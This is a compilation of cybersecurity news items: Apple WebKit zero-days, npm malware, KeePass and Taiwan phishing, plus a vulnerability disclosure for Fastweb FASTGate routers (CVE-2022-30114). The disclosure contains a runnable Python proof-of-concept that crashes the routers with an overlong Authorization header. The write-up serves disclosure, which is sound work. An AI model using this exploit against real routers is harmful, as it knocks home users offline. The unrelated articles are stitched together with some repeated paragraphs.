In an advisory released by the company, Apple revealed patches for three previously unknown bugs it  says may already have been used by attackers.

Three zero-day vulnerabilities — tracked as CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373 — were found in Apple's WebKit browser platform and affect iOS, macOS, and iPad products.

These vulnerabilities affect "iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later," Apple said in one of its new advisories.

CVE-2023-32409 is a vulnerability in which a remote attacker is "able to break out of Web Content sandbox," according to Apple. The vendor said CVE-2023-28204 entails processing Web content that may disclose sensitive information, and CVE-2023-32373 warns that processing "maliciously crafted Web content may lead to arbitrary code execution."

Apple said it's aware that the bugs may have already been actively exploited by threat actors but did not elaborate on any of these attacks.

While Apple reported that two of the three vulnerabilities were reported by anonymous researchers after they were first addressed, one of them — CVE-2023-32409 — was reported by Clément Lecigne, a security engineer in Google's Threat Analysis Group, and Donncha Ó Cearbhaill, a security researcher and hacker in Amnesty International's Security Lab.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Apple Patches 3 Zero-Days Possibly Already Exploited

It's not lack of data that's the problem, but the inability to piece it together to truly understand and reduce risk.

Device diversity, cloud adoption, remote work, and the increasingly complex software supply chain have significantly expanded today's attack surface. But despite increased year-over-year investment in security operations, most organizations only have the resources to address 10% of the millions of issues present in their environments.

Security and risk leaders need to be practical and focus on the small percentage of exposures that represent the most risk to _their_ organization. Security teams already have access to the intelligence they need to power risk-driven vulnerability prioritization, but to harness the full potential of their existing insights, they must first break down barriers caused by existing data siloes.

Everything within the digital ecosystem creates data — from autonomous network and vulnerability scanners to manual spreadsheets. Teams have to understand how each element plays a role in the prioritization decision-making process. They need to consider the threat and exposure management life cycle to explore the strengths, weaknesses, and opportunities for each resource.

**Silo 1: Cyber Asset Management**

There are ample approaches to creating a consolidated inventory of all assets and their associated risk posture: legacy spreadsheets, "traditional" network scanners and IT asset management tools, and cyber asset attack surface management (CAASM) platforms.

Depending on the approach, though, teams may only be looking at the "traditional" attack surface instead of considering everything that would be present in a typical multicloud, decentralized, and well-segmented modern network. While progress is being made in this category, it's still built off point-in-time, state-based insights. The lack of insight into attack behavior therefore impacts their overall effectiveness.

**Silo 2: Threat Detection and Response**

On the other hand, threat detection and response tools are designed to help organizations understand their attack surface from the adversary's perspective through analyzing network, user, and machine behavior. Although the quality of data from security information and event management (SIEM) systems is considerable, alert overload makes it extremely difficult for teams to comb through and extract the most pertinent information.

Additionally, threat detection and response platforms typically only monitor "known" assets for changes, whereas the greatest threat lies with the changes made to unknown assets. So, while these platforms have come a long way to expedite response and remediation, they still lack visibility into exposures beyond typical software vulnerabilities and misconfigurations. Gartner predicts unpatchable attack surfaces will grow from less than 10% of the enterprise's total exposure in 2022 to more than half by 2026.

**Silo 3: Third-Party Intelligence**

There are several ways to gauge the potential impact and exploitability of vulnerabilities, such as the Common Vulnerability Scoring System (CVSS), Exploitation Prediction Scoring System (EPSS), and vendor-specific scoring systems. CVSS is the most common method for prioritizing vulnerabilities.

The greatest risk of relying only on third-party guidance is that it doesn't consider the organization's unique requirements. For example, security teams still have to decide which patches to prioritize in a group of "severely critical" vulnerabilities (e.g., those with a CVSS score of 9.0 or higher).

In this case, it's impossible to make an informed decision using these quantitative methods alone. Factors such as the location of the asset would help teams determine the exploitability of the vulnerability within _their own_ organization, whereas its interconnectivity would give teams an idea of the blast radius — or potential overall attack path.

**Silo 4: Business Insights**

From configuration management databases (CMDBs) to controls and dependency maps to data lakes, this list wouldn't be complete without internal business tracking systems. These resources are critical to threat and exposure prioritization due to their strength in demonstrating the connections between devices and vulnerabilities, as well as the overall business criticality and dependency mapping.

But as enriching as they are, custom databases require a heavy manual lift to not only implement, but also keep current. Therefore, due to the rate at which our environments change, they quickly become outdated, making it impossible to accurately survey security posture changes.

**Change Is Programmatic, Not Tool-Centric**

While each source listed above serves its own purpose and provides a unique layer of valuable insight, none serves as a single source of truth for navigating today's sophisticated threat landscape. That said, they're extremely powerful when they work together, revealing a comprehensive vantage point that enables teams to make better, more informed decisions.

Many of the valuable insights necessary to drive informed, risk-based decisions either get lost in the siloes of enterprise tech stacks or stuck between conflicting teams and processes. Although modern environments require equally progressive security, there isn't a single tool or team that can repair this broken process.

Security leaders need to align their cyber asset intelligence to their primary use cases. That may be through mapping their vulnerability prioritization process using third-party intelligence, business context, and asset criticality, or by targeting specific control frameworks such as NIST Cybersecurity Framework or the CIS Critical Security Controls to use their security data to drive an effective security improvement program.

Data Siloes: Overcoming the Greatest Challenge in SecOps

A heap-based buffer overflow in a network service in Fastweb FASTGate MediaAccess FGA2130FWB, firmware version 18.3.n.0482_FW_230_FGA2130, and DGA4131FWB, firmware version up to 18.3.n.0462_FW_261_DGA4131, allows a remote attacker to reboot the device through a crafted HTTP request, causing DoS.

**Introduction**

CVE-2022-30114 is an unauthenticated **_heap-based_ buffer overflow** that affects **Fastweb FASTGate** home routers, both **GPON and VDSL2** versions.

 _Fastweb FASTgate_

The vulnerability lies in the _‘cmproxy’_ executable, a custom program used by Fastweb operators for remote management of the device, which handles HTTP requests through a Lighttpd FastCGI webserver listening on TCP port 8888. A specially crafted HTTP request allows a remote attacked to crash the executable and reboot the device, causing a Denial of Service.

**Credits:** Thanks to @FrancYesc0 for the firmware dumps!

**CVSS v3.x**

**Base Score:** 7.5 HIGH **Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**Affected devices**

*   **Technicolor MediaAccess FGA2130FWB** (GPON) - Version 18.3.n.0482\_FW\_233\_FGA2130 and below
*   **Technicolor MediaAccess DGA4131FWB** (VDSL2) - Version 18.3.n.0482\_FW\_264\_DGA4131 and below

**Vulnerabilty details**

The devices are vulnerable to a _heap-based_ buffer overflow, caused by the lack of validation of the length of the ‘_Authorization_’ HTTP header value on the web service exposed on **TCP port 8888**. The service is exposed on both the WAN and the LAN interfaces of the device1.

A remote, unauthenticated attacker, sending a string longer than 100 bytes in the ‘_Authorization_’ HTTP header, causes an overflow in a pre-allocated buffer in the _‘.bss’_ memory section of an executable file called _‘cmproxy’_ which handles HTTP requests sent on the mentioned service above via FastCGI protocol.

This allows to overwrite the heap memory, causing the process to become corrupted and crash on the first memory allocation. It’s worth noting that the C library version used (GNU C Library - glibc v2.24) contains protection measures to detect heap corruption but it is not excluded, however, that by deepening the analysis it would be possible to overwrite heap structures and achieve code execution.

**Technical analysis**

Starting from the usual port scan on the device, TCP port 8888 was found open, both on LAN and WAN side.

 _NMAP scan on LAN side_

A quick grep for ‘8888’ on the firmware filesystem (again, thanks @FrancYesc0 for extrated firmware!) revealed that the port was used by a Lightttpd web server instance. Below is the configuration file, found in /etc_tss/lighttpd/lighttpd.conf.

    # lighttpd configuration file
    
    server.modules = (
        "mod_fastcgi",
        "mod_access",
        "mod_auth"
    )
    
    # force use of the "write" backend (closes: #2401)
    server.network-backend = "write"
    server.document-root = "/www2/"
    server.port = 8889
    server.pid-file = "/var/run/lighttpd.pid"
    server.errorlog-use-syslog = "enable"
    server.bind = "127.0.0.1"
    
    #### fastcgi module
    fastcgi.server = (
        "/perftest" => (
            "cmproxy-local" => (
                "socket" => "/tmp/cmproxy-fastcgi-1.socket",
                "bin-path" => "/bin/cmproxy",
                "max-procs" => 4,
                "check-local" => "disable",
            )
        ),
        "/" => (
            "cmproxy-local" => (
                "socket" => "/tmp/cmproxy-fastcgi-2.socket",
                "bin-path" => "/bin/cmproxy",
                "max-procs" => 4,
                "check-local" => "disable",
            )
        )
    )
    
    $ SERVER ["socket"] == ":8888" {
        ssl.engine = "enable"
        ssl.pemfile = "/etc/nginx/server.crt"
    }
    

The server is listening on TCP port 8888 with an HTTPS service ad it uses _FastCGI_ to handle HTTP requests through a custom application in the path /bin/cmproxy (architecture is 32bit ARM).

Using Ghidra, the famous open-source reverse engineering tool by NSA, it was possible to reconstruct the executtion flow and to verify that there is a specific function that process all the input coming from the HTTP request. This function was deliberately renamed ‘_parse\_args_’.

This function is used to:

*   retrieve all the data coming from the HTTP request from the environment variables (filled by the web server using FastCGI protocol);
*   parse the data and fill local and global data structures, which will be used by the program for further processing;
*   handle error cases.

In particular, the ‘_Authorization_’ HTTP header is passed in the ‘HTTP\_AUTHORIZATION’ environment variable and its address is saved in the local variable _http\_authorization_, a string pointer.

Further on in the code, the string value is copied, using C library function _strcpy_, to the address of the variable’_auth\_string_’. This copy is done **without any control on the length of the string itself**…

This variable is an uninitialized global, thus in the _‘.bss’_ section of the ELF file, and it points to a 100 bytes buffer at the address _0x0002434c_.

Therefore, sending a string value longer than 100 characters in the ‘Authorization’ HTTP header causes _strcpy_ to smash the buffer in the ‘.bss’ and overwrite everything is saved after the address _0x00025000_. That memory segment contains the _heap_, so the buffer overflow causes the corruption of the data structures of the dynamic memory allocation used by the C library.

The picture below shows an example of the execution of the _cmproxy_ application in an emulated enviroment using QEMU. The FastCGI is simulated by filling directly environment variables. _Authorization_ header is a string of 3780 bytes, way longer than the allocated buffer. As expected, the buffer overflow corrupts the heap data structures and when the next _malloc_ is called the C library (GNU C Library - glibc v2.24) detects the memory corruption and terminates the execution as a safeguard.

On the physical device, the application crash causes the reboot of the machine.

**_PoC exploit_**

Here is a quick-and-dirty exploit in Python code.

    #!/usr/bin/env python3
    
    # PoC for MediaAccess FGA2130FWB cmproxy buffer overflow
    
    import sys
    import requests
    
    def exploit(target):
        url = 'https://{}:8888/check?cmd=xxx'.format(target)
        authorization = 'Basic ' + 'A' * 3780
    
        r = requests.get(url, headers = {'Authorization': authorization})
    
    if __name__ == '__main__':
    
        if len(sys.argv) < 2:
            print('Not enough arguments\nUsage: %s <target>' %(sys.argv[0]))
            sys.exit()
    
        target = sys.argv[1]
        print('[*] Exploiting \'%s\'' % target)
        try:
            exploit(target)
        except Exception as e:
            print(e)
            sys.exit()
    
        print('[*] Exploit sent. \'%s\' should reboot', target)

CVE-2022-30114: Fastweb FastGate ‘cmproxy’ buffer overflow (CVE-2022-30114)

Two malicious packages discovered in the npm package repository have been found to conceal an open source information stealer malware called TurkoRat.
The packages – named nodejs-encrypt-agent and nodejs-cookie-proxy-agent – were collectively downloaded approximately 1,200 times and were available for more than two months before they were identified and taken down.
ReversingLabs, which broke

Two malicious packages discovered in the npm package repository have been found to conceal an open source information stealer malware called TurkoRat.

The packages – named nodejs-encrypt-agent and nodejs-cookie-proxy-agent – were collectively downloaded approximately 1,200 times and were available for more than two months before they were identified and taken down.

ReversingLabs, which broke down the details of the campaign, described TurkoRat as an information stealer capable of harvesting sensitive information such as login credentials, website cookies, and data from cryptocurrency wallets.

While nodejs-encrypt-agent came fitted with the malware inside, nodejs-cookie-proxy-agent was found to disguise the trojan as a dependency under the name axios-proxy.

nodejs-encrypt-agent was also engineered to masquerade as another legitimate npm module known as agent-base, which has been downloaded over 25 million times to date.

The list of the rogue packages and their associated versions are listed below -

*   nodejs-encrypt-agent (versions 6.0.2, 6.0.3, 6.0.4, and 6.0.5)
*   nodejs-cookie-proxy-agent (versions 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, and 1.2.4), and
*   axios-proxy (versions 1.7.3, 1.7.4, 1.7.7, 1.7.9, 1.8.9, and 1.9.9)

"TurkoRat is just one of many open source malware families that are offered for 'testing' purposes, but can readily be downloaded and modified for malicious use, as well," Lucija Valentić, threat researcher at ReversingLabs, said.

The findings once again underscore the ongoing risk of threat actors orchestrating supply chain attacks via open source packages and baiting developers into downloading potentially untrusted code.

"Development organizations need to scrutinize the features and behaviors of the open source, third-party and commercial code they are relying on in order to track dependencies and detect potential malicious payloads in them," Valentić said.

The growing use of malicious npm packages fits in with a broader pattern of surging attacker interest in open source software supply chains, not to mention highlighting the increasing sophistication of threat actors.

Even more worryingly, researchers from Checkmarx published new research this month that showed how threat actors could impersonate authentic npm packages by "using lowercase letters to mimic uppercase letters in the original package names" (e.g., memoryStorageDriver vs memorystoragedriver).

"This malicious package impersonation takes the traditional 'Typosquatting,' attack method to a new level, where attackers register package names that consist of the exact same letters as the legitimate ones, with the only difference being capitalization," researchers Teach Zornstein and Yehuda Gelb said.

"This makes it even harder for users to detect the deception since it can be easy to overlook the subtle differences in capitalization."

The supply chain security company found that 1,900 out of 3,815 packages with capital letters in their titles could have been at risk of copycat attacks if not for a fix pushed by the npm maintainers to address the problem, which, Checkmarx said, has existed since December 2017.

The disclosure also follows another advisory from Check Point, which identified three malicious extensions hosted on the VS Code extensions marketplace. They have been purged as of May 14, 2023.

The add-ons, named prettiest java, Darcula Dark, and python-vscode, were cumulatively downloaded over 46,000 times and incorporated features that allowed the threat actors to steal credentials, system information, and establish a remote shell on the victim's machine.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

It's not just npm and VS Code marketplace, for a similar set of rogue libraries have been unearthed from the Python Package Index (PyPI) software repository as well.

Some of these packages were designed to distribute a cryptocurrency clipper malware dubbed KEKW, while other typosquatted versions of the popular flask framework included backdoor functions to receive commands from a remote server.

Another Python package uncovered by Israeli company Phylum this week was found to contain a malicious dependency that harbored an encrypted payload to grab Discord tokens and steal clipboard content in order to hijack cryptocurrency transactions.

The package, referred to as chatgpt-api by its developer Patrick Pogoda and accessible through GitHub, delivered on the functionality it advertised (i.e., interacting with OpenAI's ChatGPT tool) in an attempt to complete the ruse. The repository is still available as of writing.

"For now this actor appears to be preying on the recent explosive rise in popularity of \[Large Language Models\] with this chatgpt-api package," Phylum said, adding the threat actor has an automated mechanism to upload new iterations of the malicious dependency every time it's taken down and "maintain a persistent infection."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Developer Alert: NPM Packages for Node.js Hiding Dangerous TurkoRat Malware

Apple on Thursday rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and the Safari web browser to address three new zero-day flaws that it said are being actively exploited in the wild.
The three security shortcomings are listed below -

CVE-2023-32409 - A WebKit flaw that could be exploited by a malicious actor to break out of the Web Content sandbox. It was addressed with

Zero-Day / Endpoint Security

Apple on Thursday rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and the Safari web browser to address three new zero-day flaws that it said are being actively exploited in the wild.

The three security shortcomings are listed below -

*   **CVE-2023-32409** - A WebKit flaw that could be exploited by a malicious actor to break out of the Web Content sandbox. It was addressed with improved bounds checks.
*   **CVE-2023-28204** - An out-of-bounds read issue in WebKit that could be abused to disclose sensitive information when processing web content. It was addressed with improved input validation.
*   **CVE-2023-32373** - A use-after free bug in WebKit that could lead to arbitrary code execution when processing maliciously crafted web content. It was addressed with improved memory management.

The iPhone maker credited Clément Lecigne of Google's Threat Analysis Group (TAG) and Donncha Ó Cearbhaill of Amnesty International's Security Lab for reporting CVE-2023-32409. An anonymous researcher has been acknowledged for reporting the other two issues.

It's worth noting that both CVE-2023-28204 and CVE-2023-32373 were patched as part of Rapid Security Response updates – iOS 16.4.1 (a) and iPadOS 16.4.1 (a) – the company released at the start of the month.

There are currently no additional technical specifics about the flaws, the nature of the attacks, or the identity of the threat actors that may be exploiting them.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

That said, such weaknesses have been historically leveraged as part of highly-targeted intrusions to deploy mercenary spyware on the devices of dissidents, journalists, and human rights activists, among others.

The latest updates are available for the following devices -

*   **iOS 16.5 and iPadOS 16.5** - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
*   **iOS 15.7.6 and iPadOS 15.7.6** - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)
*   **macOS Ventura 13.4** - macOS Ventura
*   **tvOS 16.5** - Apple TV 4K (all models) and Apple TV HD
*   **watchOS 9.5** - Apple Watch Series 4 and later
*   **Safari 16.5** - macOS Big Sur and macOS Monterey

Apple has so far remediated a total of six actively exploited zero-days since the start of 2023. Earlier this February, the company plugged a WebKit flaw (CVE-2023-23529) that could lead to remote code execution.

Then last month, it shipped fixes for a pair of vulnerabilities (CVE-2023-28205 and CVE-2023-28206) that allowed for code execution with elevated privileges. Lecigne and Ó Cearbhaill were credited with reporting the security defects.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

WebKit Under Attack: Apple Issues Emergency Patches for 3 New Zero-Day Vulnerabilities

As enterprises adopt multicloud, the security picture has become foggy. Cloud workload protection platforms and distributed firewalls are creating clarity.

As enterprises move more of their business infrastructure into the cloud, they are grappling with the challenges of managing multiple cloud environments. Security firms are tackling multicloud security through increased visibility, cross-platform implementations, or a combination of the two.

On Thursday, cloud networking firm Aviatrix announced its new Distributed Cloud Firewall security platform, which combines traffic inspection and policy enforcement across multicloud environments. The firm uses native cloud platform features and its own technology to give companies a consolidated view into the security of their cloud workloads and the ability to push out the same policies to different clouds, says Rod Stuhlmuller, VP of solutions marketing at Aviatrix.

"The architecture is really what's new, not necessarily the capabilities of each of the features," he says. "It's very different than having to reroute traffic to some centralized inspection point for whatever security capabilities you're talking about — that just becomes very complex and expensive to do."

The vast majority of companies (87%) have moved their information infrastructure to a multicloud architecture, with the lion's share (72%) using a hybrid approach that combines both private cloud infrastructure and public cloud services, according to the "Flexera 2023 State of the Cloud Report." Among the top challenges for enterprises are managing their multicloud architectures and the security of their cloud infrastructure, with 80% and 78% struggling with the issues, respectively, according to Flexera.

    

Security and managing multicloud deployments are two top challenges for companies. Source: "Flexera 2023 State of Cloud Report"

As companies deploy workloads to multiple cloud service providers (CSPs), security can suffer. Because CSPs differ in the way that they handle security policies, inspection of traffic, and deploying workloads, companies can quickly lose visibility into security of their cloud infrastructure, says Patrick Coughlin, vice president of technical go-to-market for Splunk, a data and insights cloud platform.

"Let's say, maybe, you go to Google for your machine-learning tooling and workloads, you go to Azure for your core corporate business services, and you go to AWS for cost-efficient storage and overall data management. You may even have some homegrown applications that are legacy and highly regulated that you need to keep on prem," he says. "But what the security team needs is visibility across all of that, and it's a nontrivial challenge to be able to provide not just that visibility but the ability to investigate across all of that when something goes bang in the night."

**The Multicloud Security Mess**

Initially, many providers created virtual instances of their firewall appliances and set them as gateways to cloud infrastructure, but those virtual firewalls have become increasingly difficult to manage, especially across multiple cloud platforms, says John Grady, principal analyst for cybersecurity at Enterprise Strategy Group.

"Virtual firewall instances have been around for a while, but there's been an acknowledgement over the last couple of years that these deployments can be complex and cumbersome and don't take advantage of the key benefits the cloud offers," he says. "So we've seen a general shift toward more cloud-native network security solutions."

With more organizations using multiple infrastructure-as-a-service (IaaS) solutions from the top cloud companies — Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP) — finding a solution to the growing complexity is critical.

Aviatrix, for example, allows companies to create an abstracted policy that can be applied across all the cloud platforms using their native security groups, without the administrator needing to go to each cloud. For companies with proliferating workloads, driven by microservice-based software architecture, the number of containers and virtual machines that need to be updated can skyrocket, Stuhlmuller says.

"It's not that we're putting firewalls everywhere, but we're putting the inspection and enforcement capability into the network into the natural path of traffic, with a \[single management console\] that allows us to do central creation of policy but push that distributed inspection enforcement out everywhere in the network."

Other major vendors that focus on cloud workload security, albeit with differing takes on the technologies, include Palo Alto Networks, Trellix, Trend Micro, Rapid7, and Check Point Software Technologies, according to Forrester Research.

**Saving Money Becomes Paramount**

With uncertain economic times worrying the executive suites, cost savings may be the biggest argument for businesses to consolidate their view of their cloud infrastructure. A security architecture based in the cloud and representing every cloud platform in the same way helps companies more efficiently secure their cloud services, but the approach also has the real benefit of being able to save money, says Andras Cser, vice president and principal analyst at Forrester Research.

"Multicloud security cuts costs," he says. "Organizations do not have to invest in procuring and training for multiple cloud providers' security solutions. They can, instead, use a single provider or cloud provider to source all cloud security capabilities from one tool. This reduces errors, improves security posture, and cuts costs."

In addition, consolidating some features leads to cost efficiencies. Distributed firewalls, for example, have the ability to run network address translation (NAT) and charge per hour, as opposed to many vendors that charge per hour and by bandwidth, according to Aviatrix's Stuhlmuller.

Finally, a simpler approach to security in the cloud helps companies reduce the overhead of securing workloads and allows their security professionals to focus on improving the security maturity, says ESG's Grady.

"Many organizations continue to struggle with the skills shortage and are trying to do more with less," he says. "There's an efficiency benefit with a 'write-once, enforce everywhere' model, as well as time savings from not having to deploy individual instances and the associated cloud infrastructure — such as load-balancers — to support them."

Enterprises Rely on Multicloud Security to Protect Cloud Workloads

A newly discovered bug in the open source password manager, if exploited, lets attackers retrieve a target's master password — and proof-of-concept code is available.

For the second time in recent months a security researcher has discovered a vulnerability in the widely used KeePass open source password manager.

This one affects KeePass 2.X versions for Windows, Linux, and macOS, and gives attackers a way to retrieve a target's master password in cleartext from a memory dump — even when the user's workspace is closed.

While KeePass' maintainer has developed a fix for the flaw, it won't become generally available until the release of version 2.54 (likely in early June). Meanwhile, the researcher who discovered the vulnerability — tracked as CVE-2023-32784 — has already released a proof-of-concept for it on GitHub.

"No code execution on the target system is required, just a memory dump," the security researcher "vdhoney" said on GitHub. "It doesn't matter where the memory comes from — can be the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system."

An attacker can retrieve the master password even if the local user has locked the workspace and even after KeePass is no longer running, the researcher said.

Vdhoney described the vulnerability as one that only an attacker with read access to the host's filesystem or RAM would be able to exploit. Often, however, that does not require an attacker to have physical access to a system. Remote attackers routinely gain such access these days via vulnerability exploits, phishing attacks, remote access Trojans, and other methods.

"Unless you expect to be specifically targeted by someone sophisticated, I would keep calm," the researcher added.

Vdhoney said the vulnerability had to do with how a KeyPass custom box for entering passwords called "SecureTextBoxEx" processes user input. When the user types a password, there are leftover strings that allow an attacker to reassemble the password in cleartext, the researcher said. "For example, when 'Password' is typed, it will result in these leftover strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d."

**Patch in Early June**

In a discussion thread on SourceForge, KeePass maintainer Dominik Reichl acknowledged the issue and said he had implemented two enhancements to the password manager to address the problem.

The enhancements will be included in the next KeePass release (2.54), along with other security-related features, Reichel said. He initially indicated that would happen sometime in the next two months, but later revised the estimate delivery date for the new version to early June.

"To clarify, 'within the next two months' was meant as an upper bound," Reichl said. "A realistic estimate for the KeePass 2.54 release probably is 'in the beginning of June' (i.e. 2-3 weeks), but I cannot guarantee that."

**Questions About Password Manager Security**

For KeePass users, this is the second time in recent months that researchers have uncovered a security issue with the software. In February, researcher Alex Hernandez showed how an attacker with write access to KeePass' XML configuration file could edit it in a manner as to retrieve cleartext passwords from the password database and export it silently to an attacker-controlled server.

Though the vulnerability was assigned a formal identifier (CVE-2023-24055), KeePass itself disputed that description and maintained the password manager is not designed to withstand attacks from someone that already has a high level of access on a local PC.

"No password manager is safe to use when the operating environment is compromised by a malicious actor," KeePass had noted at the time. "For most users, a default installation of KeePass is safe when running on a timely patched, properly managed, and responsibly used Window environment."

The new KeyPass vulnerability is likely to keep discussions around password manager security alive for some more time. In recent months, there have several incidents that have highlighted security issues related to major password manager technologies. In December, for instance, LastPass disclosed an incident where a threat actor, using credentials from a previous intrusion at the company, accessed customer data stored with a third-party cloud service provider.

In January, researchers at Google warned about password managers such as Bitwarden, Dashlane, and Safari Password Manager auto-filling user credentials without any prompting into untrusted pages.

Threat actors meanwhile have ramped up attacks against password manager products, likely as a result of such issues.

In January, Bitwarden and 1Password reported observing paid advertisements in Google search results that directed users who opened the ads to sites for downloading spoofed versions of their password managers.

KeePass Vulnerability Imperils Master Passwords

Plug X and other information-stealing remote-access Trojans are among the malware targeting networking, manufacturing, and logistics companies in Taiwan.

Cyber espionage attacks against organizations in Taiwan have surged against the backdrop of recent political tensions, new research shows.

Trellix this week cited a fourfold rise in malicious phishing emails targeting Taiwanese companies between April 7 and 10 of this year. Networking/IT, manufacturing, and logistics, were hit the most.

The emails followed different archetypes — a fake shipment update from DHL, a fake order for bulk cement, or a fake payment overdue notification.

Some of the emails came fitted with malicious attachments, while others contained links to fake login pages designed to harvest credentials.

Following the jump in malicious emails, the researchers detected an even more significant rise in instances of PlugX — a decade-old remote access Trojan common among Chinese state-linked threat actors. PlugX is perhaps most notable for its stealthiness, using DLL sideloading as a means of circumventing Windows security measures and running arbitrary code on a target machine.

Other infostealer malware families spotted in attacks against Taiwan include Zmutzy — a Trojan written in .NET — and Formbook — a cheap infostealer-as-a-service with downloader capabilities.

Patrick Flynn, head of commercial threat intelligence at Trellix, says the majority of the attacks appear to be nation-state, with about 40% targeting Taiwan officials and agencies.

**Cyberattacks in the China-Taiwan Conflict**

Conflict between China and Taiwan dates back three quarters of a century, with the former claiming sovereignty over the autonomous latter. Tensions have ebbed and flowed ever since, with a recent flare-up precipitating from the parallel conflict in Ukraine, diplomatic meetings between American and Taiwanese officials, and Chinese military drills in the Taiwan Strait. The political and economic implications are severe.

As in Ukraine, cyberattacks have long played a role in the Taiwan conflict — a simpler, more cost-effective, and less politically dangerous weapon of war most often deployed by the more powerful side to target their adversary.

"Cyberwarfare is an attractive option for a number of nation states, as it lets them target their adversaries without escalating to a 'shooting war,'" says Mike Parkin, senior technical engineer at Vulcan Cyber.

In January 2023, for example, Trellix observed a 30-times increase in extortion emails sent to Taiwanese officials. "Though it's unclear if this activity is from China-backed threat actors, it speaks to a continued increase in attacks specifically targeting Taiwan," the researchers explained.

For now, there's no reason to believe that cyber campaigns against Taiwan and its economy will slow down any time soon, so the impetus will fall on organizations to defend themselves.

"In most cases, the things we do to counter common cybercriminals are the same things we should be doing to counter nation-state attacks: training users, up-to-date patches, secure configurations, etc.," Parkin says.

But "state-level threats are likely to have more resources and can deploy more sophisticated malware, more targeted phishing attacks, and they have the time and energy to stay persistent," he says. "Facing threats like that makes it even more important for us to have our security stack at least to baseline."

Trojan-Rigged Phishing Attacks Pepper China-Taiwan Conflict

The work is always going to be there, whether you take a day or a week off. Unfortunately, the cybersecurity community at large is not going to stop cybercrime overnight.

Thursday, May 18, 2023 14:05

Welcome to this week’s edition of the Threat Source newsletter.

You probably already know this by now, but May is Mental Health Awareness Month across the globe.

Many people will apply this time of reflection and education to their personal lives — it’s easy to discuss anxiety, depression and other mental health concerns when it comes to things like personal relationships, friendships, family and how you express yourself.

I think not enough of us are applying the discussions we have every May to work, though. After all, many of us spend more than half our day working, and probably even more than that, thinking about work. And yes, it’s important to maintain healthy relationships around you and share your feelings with loved ones openly, but I would like us all to start being more honest about how work can affect our mental health.

This is particularly a problem in the cybersecurity industry, where burnout is constantly a cloud hanging over the workforce. A study last year from email security company Mimecast found that 84 percent of cybersecurity professionals are experiencing some form of burnout and it’s impeding their motivation at work.

And the Australian non-profit Cybermindz also found cybersecurity workers ranked their “professional efficacy,” or how well they feel they’re performing in their current role, lower than the general population — this is a key metric used to measure burnout in each industry.

I feel this is a problem in cybersecurity for several reasons: it seems like defenders can never take a day (or even an hour) off without something “hitting the fan,” the work can often be incredibly high-stakes and there is the ghost of social media always hanging over our head to be the “first” to find something or always needing to add something witty or insightful to the conversation of the day.

I would certainly not call myself a cybersecurity practitioner, per se, so I don’t have much hands-on experience with this. But I know from talking to teammates as part of my Researcher Spotlight blog series how important it is to have other interests outside of work.

And while I can’t say I’m personally experiencing burnout at work, I have dealt with anxiety for pretty much my entire life and have attended talk therapy on and off over the past few years and currently take medication to manage my various mental health conditions. That makes me feel somewhat empowered to say: It’s OK to take a break.

This is something Talos VP Matt Watchinski said in a conversation with Hazel Burton and I this week that we recorded for an upcoming episode of Talos Takes. The work is always going to be there, whether you take a day or a week off. Unfortunately, the cybersecurity community at large is not going to stop cybercrime overnight. And the threat of state-sponsored actors is not going to be solved by a single botnet takedown.

I would encourage everyone to have harder barriers up around their work and personal lives. Take up a new hobby or find a way to get outside. For example, Azim Khodjibaev is a rowing coach. Giannis Tziakouris from Cisco Talos Incident Response scuba dives. Watchinski has shooting sports.

Find your thing that is not explicitly work — because the work will be there when you get back, I promise.

**The one big thing**

A new ransomware actor we’re calling “RA Group” has been active for about a month, already targeting organizations across multiple sectors in the U.S. and South Korea. Talos researchers believe with high confidence that the group is using altered leaked source code from the Babuk ransomware family. The group is launching double extortion attacks. Like other ransomware actors, RA Group also operates a data leak site in which they threaten to publish the data exfiltrated from victims who fail to contact them within a specified time or do not meet their ransom demands.

**Why do I care?**

The actor is swiftly expanding its operations. To date, the group has compromised three organizations in the U.S. and one in South Korea across several business verticals, including manufacturing, wealth management, insurance providers and pharmaceuticals. Since ransomware continues to be one of the top security threats all industries face, it’s always important to keep an eye out for new groups that pop up.

**So now what?**

The Talos blog outlines several ways that Cisco Secure products and Talos open-source software can detect and block RA Group’s activities.

**Top security headlines of the week**

**Global governments are being urged to take a more aggressive stance on spyware regulation.** The European Union has agreed to work on standards around the purchase and use of these types of tracking software, which often target vulnerable populations and industries like activists and journalists. A special European Parliament committee voted this week to ban the sale, acquisition, or use of spyware while the broader EU works on these new guidelines. In the U.S., some government agencies have still been attempting to use spyware, such as tools from the infamous NSO Group, despite bans on spyware from the Biden administration. Reporters from the New York Times found at least one government contract with Paragon, another Israeli software developer that makes spyware but is not as widely known as the NSO Group. (New York Times, The Guardian)

